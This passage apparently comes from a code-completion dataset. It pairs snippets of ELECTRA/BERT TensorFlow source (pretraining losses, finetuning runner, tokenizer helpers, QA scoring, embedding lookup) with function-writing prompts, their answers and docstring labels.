weights=tf.reshape(d["masked_lm_weights"], [-1]))
if config.electra_objective:
metrics["sampled_masked_lm_accuracy"] = tf.metrics.accuracy(
labels=tf.reshape(d["masked_lm_ids"], [-1]),
predictions=tf.reshape(d["sampled_tokids"], [-1]),
weights=tf.reshape(d["masked_lm_weights"], [-1]))
if config.disc_weight > 0:
metrics["disc_loss"] = tf.metrics.mean(d["disc_loss"])
metrics["disc_auc"] = tf.metrics.auc(
d["disc_labels"] * d["input_mask"],
d["disc_probs"] * tf.cast(d["input_mask"], tf.float32))
metrics["disc_accuracy"] = tf.metrics.accuracy(
labels=d["disc_labels"], predictions=d["disc_preds"],
weights=d["input_mask"])
metrics["disc_precision"] = tf.metrics.accuracy(
labels=d["disc_labels"], predictions=d["disc_preds"],
weights=d["disc_preds"] * d["input_mask"])
metrics["disc_recall"] = tf.metrics.accuracy(
labels=d["disc_labels"], predictions=d["disc_preds"],
weights=d["disc_labels"] * d["input_mask"])
return metrics
self.eval_metrics = (metric_fn, eval_fn_values)
def _get_masked_lm_output(self, inputs: pretrain_data.Inputs, model):
"""Masked language modeling softmax layer."""
masked_lm_weights = inputs.masked_lm_weights
with tf.variable_scope("generator_predictions"):
if self._config.uniform_generator:
logits = tf.zeros(self._bert_config.vocab_size)
logits_tiled = tf.zeros(
modeling.get_shape_list(inputs.masked_lm_ids) +
[self._bert_config.vocab_size])
logits_tiled += tf.reshape(logits, [1, 1, self._bert_config.vocab_size])
logits = logits_tiled
else:
relevant_hidden = pretrain_helpers.gather_positions(
model.get_sequence_output(), inputs.masked_lm_positions)
hidden = tf.layers.dense(
relevant_hidden,
units=modeling.get_shape_list(model.get_embedding_table())[-1],
activation=modeling.get_activation(self._bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
self._bert_config.initializer_range))
hidden = modeling.layer_norm(hidden)
output_bias = tf.get_variable(
"output_bias",
shape=[self._bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(hidden, model.get_embedding_table(),
transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
oh_labels = tf.one_hot(
inputs.masked_lm_ids, depth=self._bert_config.vocab_size,
dtype=tf.float32)
probs = tf.nn.softmax(logits)
log_probs = tf.nn.log_softmax(logits)
label_log_probs = -tf.reduce_sum(log_probs * oh_labels, axis=-1)
numerator = tf.reduce_sum(inputs.masked_lm_weights * label_log_probs)
denominator = tf.reduce_sum(masked_lm_weights) + 1e-6
loss = numerator / denominator
preds = tf.argmax(log_probs, axis=-1, output_type=tf.int32)
MLMOutput = collections.namedtuple(
"MLMOutput", ["logits", "probs", "loss", "per_example_loss", "preds"])
return MLMOutput(
logits=logits, probs=probs, per_example_loss=label_log_probs,
loss=loss, preds=preds)
def _get_discriminator_output(self, inputs, discriminator, labels):
"""Discriminator binary classifier."""
with tf.variable_scope("discriminator_predictions"):
hidden = tf.layers.dense(
discriminator.get_sequence_output(),
units=self._bert_config.hidden_size,
activation=modeling.get_activation(self._bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
self._bert_config.initializer_range))
logits = tf.squeeze(tf.layers.dense(hidden, units=1), -1)
weights = tf.cast(inputs.input_mask, tf.float32)
labelsf = tf.cast(labels, tf.float32)
losses = tf.nn.sigmoid_cross_entropy_with_logits(
logits=logits, labels=labelsf) * weights
per_example_loss = (tf.reduce_sum(losses, axis=-1) /
(1e-6 + tf.reduce_sum(weights, axis=-1)))
loss = tf.reduce_sum(losses) / (1e-6 + tf.reduce_sum(weights))
probs = tf.nn.sigmoid(logits)
preds = tf.cast(tf.round((tf.sign(logits) + 1) / 2), tf.int32)
DiscOutput = collections.namedtuple(
"DiscOutput", ["loss", "per_example_loss", "probs", "preds",
"labels"])
return DiscOutput(
loss=loss, per_example_loss=per_example_loss, probs=probs,
preds=preds, labels=labels,
)
def _get_fake_data(self, inputs, mlm_logits):
"""Sample from the generator to create corrupted input."""
inputs = pretrain_helpers.unmask(inputs)
disallow = tf.one_hot(
inputs.masked_lm_ids, depth=self._bert_config.vocab_size,
dtype=tf.float32) if self._config.disallow_correct else None
sampled_tokens = tf.stop_gradient(pretrain_helpers.sample_from_softmax(
mlm_logits / self._config.temperature, disallow=disallow))
sampled_tokids = tf.argmax(sampled_tokens, -1, output_type=tf.int32)
updated_input_ids, masked = pretrain_helpers.scatter_update(
inputs.input_ids, sampled_tokids, inputs.masked_lm_positions)
labels = masked * (1 - tf.cast(
tf.equal(updated_input_ids, inputs.input_ids), tf.int32))
updated_inputs = pretrain_data.get_updated_inputs(
inputs, input_ids=updated_input_ids)
FakedData = collections.namedtuple("FakedData", [
"inputs", "is_fake_tokens", "sampled_tokens"])
return FakedData(inputs=updated_inputs, is_fake_tokens=labels,
sampled_tokens=sampled_tokens)
def _build_transformer(self, inputs: pretrain_data.Inputs, is_training,
bert_config=None, name="electra", reuse=False, **kwargs):
"""Build a transformer encoder network."""
if bert_config is None:
bert_config = self._bert_config
with tf.variable_scope(tf.get_variable_scope(), reuse=reuse):
return modeling.BertModel(
bert_config=bert_config,
is_training=is_training,
input_ids=inputs.input_ids,
input_mask=inputs.input_mask,
token_type_ids=inputs.segment_ids,
use_one_hot_embeddings=self._config.use_tpu,
scope=name,
**kwargs)
The provided code snippet includes necessary dependencies for implementing the `train_one_step` function. Write a Python function `def train_one_step(config: configure_pretraining.PretrainingConfig)` to solve the following problem:
Builds an ELECTRA model an trains it for one step; useful for debugging.
Here is the function:
def train_one_step(config: configure_pretraining.PretrainingConfig):
"""Builds an ELECTRA model an trains it for one step; useful for debugging."""
train_input_fn = pretrain_data.get_input_fn(config, True)
features = tf.data.make_one_shot_iterator(train_input_fn(dict(
batch_size=config.train_batch_size))).get_next()
model = PretrainingModel(config, features, True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
utils.log(sess.run(model.total_loss)) | Builds an ELECTRA model an trains it for one step; useful for debugging. |
6,204 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import preprocessing
from finetune import task_builder
from model import modeling
from model import optimization
from util import training_utils
from util import utils
import numpy as np
class FinetuningModel(object):
"""Finetuning model with support for multi-task training."""
def __init__(self, config: configure_finetuning.FinetuningConfig, tasks,
is_training, features, num_train_steps):
# Create a shared transformer encoder
bert_config = training_utils.get_bert_config(config)
self.bert_config = bert_config
if config.debug:
bert_config.num_hidden_layers = 3
bert_config.hidden_size = 144
bert_config.intermediate_size = 144 * 4
bert_config.num_attention_heads = 4
assert config.max_seq_length <= bert_config.max_position_embeddings
bert_model = modeling.BertModel(
bert_config=bert_config,
is_training=is_training,
input_ids=features["input_ids"],
input_mask=features["input_mask"],
token_type_ids=features["segment_ids"],
use_one_hot_embeddings=config.use_tpu,
embedding_size=config.embedding_size)
percent_done = (tf.cast(tf.train.get_or_create_global_step(), tf.float32) /
tf.cast(num_train_steps, tf.float32))
# Add specific tasks
self.outputs = {"task_id": features["task_id"]}
losses = []
for task in tasks:
with tf.variable_scope("task_specific/" + task.name):
task_losses, task_outputs = task.get_prediction_module(
bert_model, features, is_training, percent_done)
losses.append(task_losses)
self.outputs[task.name] = task_outputs
self.loss = tf.reduce_sum(
tf.stack(losses, -1) *
tf.one_hot(features["task_id"], len(config.task_names)))
The provided code snippet includes necessary dependencies for implementing the `model_fn_builder` function. Write a Python function `def model_fn_builder(config: configure_finetuning.FinetuningConfig, tasks, num_train_steps, pretraining_config=None)` to solve the following problem:
Returns `model_fn` closure for TPUEstimator.
Here is the function:
def model_fn_builder(config: configure_finetuning.FinetuningConfig, tasks,
num_train_steps, pretraining_config=None):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params):
"""The `model_fn` for TPUEstimator."""
utils.log("Building model...")
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = FinetuningModel(
config, tasks, is_training, features, num_train_steps)
# Load pre-trained weights from checkpoint
init_checkpoint = config.init_checkpoint
if pretraining_config is not None:
init_checkpoint = tf.train.latest_checkpoint(pretraining_config.model_dir)
utils.log("Using checkpoint", init_checkpoint)
tvars = tf.trainable_variables()
# calculate total number of params
num_params = sum([np.prod(v.shape) for v in tvars])
utils.log('##### params: {} #####'.format(num_params))
scaffold_fn = None
if init_checkpoint:
assignment_map, _ = modeling.get_assignment_map_from_checkpoint(
tvars, init_checkpoint)
if config.use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
# Build model for training or prediction
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
model.loss, config.learning_rate, num_train_steps,
weight_decay_rate=config.weight_decay_rate,
use_tpu=config.use_tpu,
warmup_proportion=config.warmup_proportion,
layerwise_lr_decay_power=config.layerwise_lr_decay,
n_transformer_layers=model.bert_config.num_hidden_layers
)
output_spec = tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
loss=model.loss,
train_op=train_op,
scaffold_fn=scaffold_fn,
training_hooks=[training_utils.ETAHook(
{} if config.use_tpu else dict(loss=model.loss),
num_train_steps, config.iterations_per_loop, config.use_tpu, 10)])
else:
assert mode == tf.estimator.ModeKeys.PREDICT
output_spec = tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
predictions=utils.flatten_dict(model.outputs),
scaffold_fn=scaffold_fn)
utils.log("Building complete")
return output_spec
return model_fn | Returns `model_fn` closure for TPUEstimator. |
6,205 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import preprocessing
from finetune import task_builder
from model import modeling
from model import optimization
from util import training_utils
from util import utils
import numpy as np
class ModelRunner(object):
"""Fine-tunes a model on a supervised task."""
def __init__(self, config: configure_finetuning.FinetuningConfig, tasks,
pretraining_config=None):
self._config = config
self._tasks = tasks
self._preprocessor = preprocessing.Preprocessor(config, self._tasks)
is_per_host = tf.estimator.tpu.InputPipelineConfig.PER_HOST_V2
tpu_cluster_resolver = None
if config.use_tpu and config.tpu_name:
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
config.tpu_name, zone=config.tpu_zone, project=config.gcp_project)
tpu_config = tf.estimator.tpu.TPUConfig(
iterations_per_loop=config.iterations_per_loop,
num_shards=config.num_tpu_cores,
per_host_input_for_training=is_per_host,
tpu_job_name=config.tpu_job_name)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=config.model_dir,
save_checkpoints_steps=config.save_checkpoints_steps,
save_checkpoints_secs=None,
tpu_config=tpu_config)
if self._config.do_train:
(self._train_input_fn,
self.train_steps) = self._preprocessor.prepare_train()
else:
self._train_input_fn, self.train_steps = None, 0
model_fn = model_fn_builder(
config=config,
tasks=self._tasks,
num_train_steps=self.train_steps,
pretraining_config=pretraining_config)
self._estimator = tf.estimator.tpu.TPUEstimator(
use_tpu=config.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=config.train_batch_size,
eval_batch_size=config.eval_batch_size,
predict_batch_size=config.predict_batch_size)
def train(self):
utils.log("Training for {:} steps".format(self.train_steps))
self._estimator.train(
input_fn=self._train_input_fn, max_steps=self.train_steps)
def evaluate(self, split="dev"):
return {task.name: self.evaluate_task(task, split=split) for task in self._tasks}
def evaluate_task(self, task, split="dev", return_results=True):
"""Evaluate the current model."""
utils.log("Evaluating", task.name, split)
eval_input_fn, _ = self._preprocessor.prepare_predict([task], split)
results = self._estimator.predict(input_fn=eval_input_fn,
yield_single_examples=True)
if task.name == "cmrc2018" or task.name == "drcd":
scorer = task.get_scorer(split)
else:
scorer = task.get_scorer()
for r in results:
if r["task_id"] != len(self._tasks): # ignore padding examples
r = utils.nest_dict(r, self._config.task_names)
scorer.update(r[task.name])
if return_results:
utils.log(task.name + ": " + scorer.results_str())
utils.log()
return dict(scorer.get_results())
else:
return scorer
def write_classification_outputs(self, tasks, trial, split):
"""Write classification predictions to disk."""
utils.log("Writing out predictions for", tasks, split)
predict_input_fn, _ = self._preprocessor.prepare_predict(tasks, split)
results = self._estimator.predict(input_fn=predict_input_fn,
yield_single_examples=True)
# task name -> eid -> model-logits
logits = collections.defaultdict(dict)
for r in results:
if r["task_id"] != len(self._tasks):
r = utils.nest_dict(r, self._config.task_names)
task_name = self._config.task_names[r["task_id"]]
logits[task_name][r[task_name]["eid"]] = (
r[task_name]["logits"] if "logits" in r[task_name]
else r[task_name]["predictions"])
for task_name in logits:
utils.log("Pickling predictions for {:} {:} examples ({:})".format(
len(logits[task_name]), task_name, split))
if trial <= self._config.n_writes_test:
utils.write_pickle(logits[task_name], self._config.test_predictions(
task_name, split, trial))
def write_results(config: configure_finetuning.FinetuningConfig, results):
"""Write evaluation metrics to disk."""
utils.log("Writing results to", config.results_txt)
utils.mkdir(config.results_txt.rsplit("/", 1)[0])
utils.write_pickle(results, config.results_pkl)
with tf.io.gfile.GFile(config.results_txt, "w") as f:
results_str = ""
for trial_results in results:
for task_name, task_results in trial_results.items():
if task_name == "time" or task_name == "global_step":
continue
results_str += task_name + ": " + " - ".join(
["{:}: {:.2f}".format(k, v)
for k, v in task_results.items()]) + "\n"
f.write(results_str)
utils.write_pickle(results, config.results_pkl)
The provided code snippet includes necessary dependencies for implementing the `run_finetuning` function. Write a Python function `def run_finetuning(config: configure_finetuning.FinetuningConfig)` to solve the following problem:
Run finetuning.
Here is the function:
def run_finetuning(config: configure_finetuning.FinetuningConfig):
"""Run finetuning."""
# Setup for training
results = []
trial = 1
heading_info = "model={:}, trial {:}/{:}".format(
config.model_name, trial, config.num_trials)
heading = lambda msg: utils.heading(msg + ": " + heading_info)
heading("Config")
utils.log_config(config)
generic_model_dir = config.model_dir
tasks = task_builder.get_tasks(config)
# Train and evaluate num_trials models with different random seeds
while config.num_trials < 0 or trial <= config.num_trials:
config.model_dir = generic_model_dir + "_" + str(trial)
if config.do_train:
utils.rmkdir(config.model_dir)
model_runner = ModelRunner(config, tasks)
if config.do_train:
heading_info = "model={:}, trial {:}/{:}".format(config.model_name, trial, config.num_trials)
heading("Start training")
model_runner.train()
utils.log()
if config.do_eval:
if config.write_test_outputs and trial <= config.n_writes_test:
heading("Running on the dev set and writing the predictions")
for task in tasks:
# Currently only writing preds for GLUE and SQuAD 2.0 is supported
if task.name in ["cola", "mrpc", "mnli", "sst", "rte", "qnli", "qqp",
"sts"]:
for split in task.get_test_splits():
model_runner.write_classification_outputs([task], trial, split)
elif task.name == "squad":
scorer = model_runner.evaluate_task(task, "dev", False)
scorer.write_predictions()
preds = utils.load_json(config.qa_preds_file(task.name+"_dev"))
null_odds = utils.load_json(config.qa_na_file(task.name+"_dev"))
for q, _ in preds.items():
if null_odds[q] > config.qa_na_threshold:
preds[q] = ""
utils.write_json(preds, config.test_predictions(
task.name, "dev", trial))
elif task.name == "cmrc2018" or task.name == "drcd":
scorer = model_runner.evaluate_task(task, "dev", False)
scorer.write_predictions()
preds = utils.load_json(config.qa_preds_file(task.name+"_dev"))
#utils.write_json(preds, config.test_predictions(task.name, "dev", trial))
if config.num_trials > 1:
utils.write_json(preds, config.qa_preds_file(task.name+"_dev_"+str(trial)))
else:
utils.log("Skipping task", task.name,
"- writing predictions is not supported for this task")
else:
heading("Run dev set evaluation")
results.append(model_runner.evaluate(split="dev"))
write_results(config, results)
if config.do_test:
if config.write_test_outputs and trial <= config.n_writes_test:
heading("Running on the test set and writing the predictions")
for task in tasks:
# Currently only writing preds for GLUE and SQuAD 2.0 is supported
if task.name in ["cola", "mrpc", "mnli", "sst", "rte", "qnli", "qqp",
"sts"]:
for split in task.get_test_splits():
model_runner.write_classification_outputs([task], trial, split)
elif task.name == "squad":
scorer = model_runner.evaluate_task(task, "eval", False)
scorer.write_predictions()
preds = utils.load_json(config.qa_preds_file(task.name+"_eval"))
null_odds = utils.load_json(config.qa_na_file(task.name+"_eval"))
for q, _ in preds.items():
if null_odds[q] > config.qa_na_threshold:
preds[q] = ""
utils.write_json(preds, config.test_predictions(
task.name, "eval", trial))
elif task.name == "cmrc2018" or task.name == "drcd":
scorer = model_runner.evaluate_task(task, "eval", False)
scorer.write_predictions()
preds = utils.load_json(config.qa_preds_file(task.name+"_eval"))
#utils.write_json(preds, config.test_predictions(task.name, "eval", trial))
if config.num_trials > 1:
utils.write_json(preds, config.qa_preds_file(task.name+"_eval_"+str(trial)))
else:
utils.log("Skipping task", task.name,
"- writing predictions is not supported for this task")
else:
heading("Run test set evaluation")
results.append(model_runner.evaluate(split="eval"))
write_results(config, results)
if trial != config.num_trials and (not config.keep_all_models):
utils.rmrf(config.model_dir)
trial += 1 | Run finetuning. |
6,206 | from __future__ import print_function
from collections import Counter, OrderedDict
import string
import re
import argparse
import json
import sys
sys.setdefaultencoding('utf8')
import nltk
import pdb
def calc_f1_score(answers, prediction):
f1_scores = []
for ans in answers:
ans_segs = mixed_segmentation(ans, rm_punc=True)
prediction_segs = mixed_segmentation(prediction, rm_punc=True)
lcs, lcs_len = find_lcs(ans_segs, prediction_segs)
if lcs_len == 0:
f1_scores.append(0)
continue
precision = 1.0*lcs_len/len(prediction_segs)
recall = 1.0*lcs_len/len(ans_segs)
f1 = (2*precision*recall)/(precision+recall)
f1_scores.append(f1)
return max(f1_scores)
def calc_em_score(answers, prediction):
em = 0
for ans in answers:
ans_ = remove_punctuation(ans)
prediction_ = remove_punctuation(prediction)
if ans_ == prediction_:
em = 1
break
return em
def evaluate(ground_truth_file, prediction_file):
f1 = 0
em = 0
total_count = 0
skip_count = 0
for instance in ground_truth_file["data"]:
#context_id = instance['context_id'].strip()
#context_text = instance['context_text'].strip()
for para in instance["paragraphs"]:
for qas in para['qas']:
total_count += 1
query_id = qas['id'].strip()
query_text = qas['question'].strip()
answers = [x["text"] for x in qas['answers']]
if query_id not in prediction_file:
sys.stderr.write('Unanswered question: {}\n'.format(query_id))
skip_count += 1
continue
prediction = str(prediction_file[query_id]).decode('utf-8')
f1 += calc_f1_score(answers, prediction)
em += calc_em_score(answers, prediction)
f1_score = 100.0 * f1 / total_count
em_score = 100.0 * em / total_count
return f1_score, em_score, total_count, skip_count | null |
6,207 | import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
The provided code snippet includes necessary dependencies for implementing the `write_examples` function. Write a Python function `def write_examples(job_id, args)` to solve the following problem:
A single process creating and writing out pre-processed examples.
Here is the function:
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
owt_dir = os.path.join(args.data_dir, "openwebtext")
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = build_pretraining_dataset.ExampleWriter(
job_id=job_id,
vocab_file=os.path.join(args.data_dir, "vocab.txt"),
output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=False,
do_lower_case=args.do_lower_case
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(owt_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0 and file_no % 10 == 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
utils.rmkdir(job_tmp_dir)
with tarfile.open(os.path.join(owt_dir, fname)) as f:
f.extractall(job_tmp_dir)
extracted_files = tf.io.gfile.listdir(job_tmp_dir)
random.shuffle(extracted_files)
for txt_fname in extracted_files:
example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
example_writer.finish()
log("Done!") | A single process creating and writing out pre-processed examples. |
6,208 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
The provided code snippet includes necessary dependencies for implementing the `load_vocab` function. Write a Python function `def load_vocab(vocab_file)` to solve the following problem:
Loads a vocabulary file into a dictionary.
Here is the function:
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with tf.io.gfile.GFile(vocab_file, "r") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab | Loads a vocabulary file into a dictionary. |
6,209 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_by_vocab(vocab, items):
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens) | null |
6,210 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids) | null |
6,211 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `whitespace_tokenize` function. Write a Python function `def whitespace_tokenize(text)` to solve the following problem:
Runs basic whitespace cleaning and splitting on a piece of text.
Here is the function:
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens | Runs basic whitespace cleaning and splitting on a piece of text. |
6,212 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_whitespace` function. Write a Python function `def _is_whitespace(char)` to solve the following problem:
Checks whether `chars` is a whitespace character.
Here is the function:
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False | Checks whether `chars` is a whitespace character. |
6,213 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_control` function. Write a Python function `def _is_control(char)` to solve the following problem:
Checks whether `chars` is a control character.
Here is the function:
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False | Checks whether `chars` is a control character. |
6,214 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_punctuation` function. Write a Python function `def _is_punctuation(char)` to solve the following problem:
Checks whether `chars` is a punctuation character.
Here is the function:
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False | Checks whether `chars` is a punctuation character. |
6,215 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def gelu(input_tensor):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
input_tensor: float Tensor to perform activation.
Returns:
`input_tensor` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.sqrt(2.0)))
return input_tensor * cdf
The provided code snippet includes necessary dependencies for implementing the `get_activation` function. Write a Python function `def get_activation(activation_string)` to solve the following problem:
Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`. Args: activation_string: String name of the activation function. Returns: A Python function corresponding to the activation function. If `activation_string` is None, empty, or "linear", this will return None. If `activation_string` is not a string, it will return `activation_string`. Raises: ValueError: The `activation_string` does not correspond to a known activation.
Here is the function:
def get_activation(activation_string):
"""Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`.
Args:
activation_string: String name of the activation function.
Returns:
A Python function corresponding to the activation function. If
`activation_string` is None, empty, or "linear", this will return None.
If `activation_string` is not a string, it will return `activation_string`.
Raises:
ValueError: The `activation_string` does not correspond to a known
activation.
"""
# We assume that anything that"s not a string is already an activation
# function, so we just return it.
if not isinstance(activation_string, six.string_types):
return activation_string
if not activation_string:
return None
act = activation_string.lower()
if act == "linear":
return None
elif act == "relu":
return tf.nn.relu
elif act == "gelu":
return gelu
elif act == "tanh":
return tf.tanh
else:
raise ValueError("Unsupported activation: %s" % act) | Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`. Args: activation_string: String name of the activation function. Returns: A Python function corresponding to the activation function. If `activation_string` is None, empty, or "linear", this will return None. If `activation_string` is not a string, it will return `activation_string`. Raises: ValueError: The `activation_string` does not correspond to a known activation. |
6,216 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def create_initializer(initializer_range=0.02):
"""Creates a `truncated_normal_initializer` with the given range."""
return tf.truncated_normal_initializer(stddev=initializer_range)
def get_shape_list(tensor, expected_rank=None, name=None):
"""Returns a list of the shape of tensor, preferring static dimensions.
Args:
tensor: A tf.Tensor object to find the shape of.
expected_rank: (optional) int. The expected rank of `tensor`. If this is
specified and the `tensor` has a different rank, and exception will be
thrown.
name: Optional name of the tensor for the error message.
Returns:
A list of dimensions of the shape of tensor. All static dimensions will
be returned as python integers, and dynamic dimensions will be returned
as tf.Tensor scalars.
"""
if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
shape = np.array(tensor).shape
if isinstance(expected_rank, six.integer_types):
assert len(shape) == expected_rank
elif expected_rank is not None:
assert len(shape) in expected_rank
return shape
if name is None:
name = tensor.name
if expected_rank is not None:
assert_rank(tensor, expected_rank, name)
shape = tensor.shape.as_list()
non_static_indexes = []
for (index, dim) in enumerate(shape):
if dim is None:
non_static_indexes.append(index)
if not non_static_indexes:
return shape
dyn_shape = tf.shape(tensor)
for index in non_static_indexes:
shape[index] = dyn_shape[index]
return shape
The provided code snippet includes necessary dependencies for implementing the `embedding_lookup` function. Write a Python function `def embedding_lookup(input_ids, vocab_size, embedding_size=128, initializer_range=0.02, word_embedding_name="word_embeddings", use_one_hot_embeddings=False)` to solve the following problem:
Looks up words embeddings for id tensor. Args: input_ids: int32 Tensor of shape [batch_size, seq_length] containing word ids. vocab_size: int. Size of the embedding vocabulary. embedding_size: int. Width of the word embeddings. initializer_range: float. Embedding initialization range. word_embedding_name: string. Name of the embedding table. use_one_hot_embeddings: bool. If True, use one-hot method for word embeddings. If False, use `tf.nn.embedding_lookup()`. One hot is better for TPUs. Returns: float Tensor of shape [batch_size, seq_length, embedding_size].
Here is the function:
def embedding_lookup(input_ids,
vocab_size,
embedding_size=128,
initializer_range=0.02,
word_embedding_name="word_embeddings",
use_one_hot_embeddings=False):
"""Looks up words embeddings for id tensor.
Args:
input_ids: int32 Tensor of shape [batch_size, seq_length] containing word
ids.
vocab_size: int. Size of the embedding vocabulary.
embedding_size: int. Width of the word embeddings.
initializer_range: float. Embedding initialization range.
word_embedding_name: string. Name of the embedding table.
use_one_hot_embeddings: bool. If True, use one-hot method for word
embeddings. If False, use `tf.nn.embedding_lookup()`. One hot is better
for TPUs.
Returns:
float Tensor of shape [batch_size, seq_length, embedding_size].
"""
# This function assumes that the input is of shape [batch_size, seq_length,
# num_inputs].
#
# If the input is a 2D tensor of shape [batch_size, seq_length], we
# reshape to [batch_size, seq_length, 1].
original_dims = input_ids.shape.ndims
if original_dims == 2:
input_ids = tf.expand_dims(input_ids, axis=[-1])
embedding_table = tf.get_variable(
name=word_embedding_name,
shape=[vocab_size, embedding_size],
initializer=create_initializer(initializer_range))
if original_dims == 3:
input_shape = get_shape_list(input_ids)
tf.reshape(input_ids, [-1, input_shape[-1]])
output = tf.matmul(input_ids, embedding_table)
output = tf.reshape(output,
[input_shape[0], input_shape[1], embedding_size])
else:
if use_one_hot_embeddings:
flat_input_ids = tf.reshape(input_ids, [-1])
one_hot_input_ids = tf.one_hot(flat_input_ids, depth=vocab_size)
output = tf.matmul(one_hot_input_ids, embedding_table)
else:
output = tf.nn.embedding_lookup(embedding_table, input_ids)
input_shape = get_shape_list(input_ids)
output = tf.reshape(output,
input_shape[0:-1] + [input_shape[-1] * embedding_size])
